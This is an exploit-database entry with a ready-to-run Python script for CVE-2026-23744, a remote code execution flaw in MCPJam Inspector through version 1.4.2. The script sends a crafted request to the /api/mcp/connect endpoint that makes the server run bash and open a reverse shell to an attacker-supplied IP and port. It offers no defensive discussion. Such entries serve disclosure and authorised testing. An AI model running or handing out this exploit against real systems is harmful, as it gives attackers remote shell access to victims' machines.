MCPJam Inspector - Remote Code Execution

EDB-ID:

52625




Platform:

Multiple

Date:

2026-07-07


# Exploit Title: MCPJam Inspector - Remote Code Execution 
# Date: 07/03/2026
# Exploit Author: Diamorphine
# Vendor Homepage: https://www.mcpjam.com/
# Software Link: https://github.com/MCPJam
# Version: <=1.4.2
# Tested on: Debian
# CVE : CVE-2026-23744


import asyncio
import httpx
import argparse
from urllib.parse import urljoin


async def main(attacker_ip, attacker_port, url):
    async with httpx.AsyncClient(verify=False) as client:
        data = {
            "serverConfig": {
                "command": "bash",
                "args": ["-c", f"bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1"],
                "env": {}
            },
            "serverId": "Hello666"
        }
        
        ready_url = urljoin(url, "/api/mcp/connect")
        r = await client.post(url=ready_url, json=data)
        print(r.text)

parser = argparse.ArgumentParser(description="Exploit for CVE-2026-23744 MCPJam Inspector - Remote Code Execution")

parser.add_argument("-u", "--url", required=True, help="Target host. e.g. http://127.0.0.1:8080")
parser.add_argument("-l", "--lhost", required=True, help="Attacker ip")
parser.add_argument("-p", "--lport", required=True, help="Attacker port")

args = parser.parse_args()

if __name__ == '__main__':
    asyncio.run(main(args.lhost, args.lport, args.url))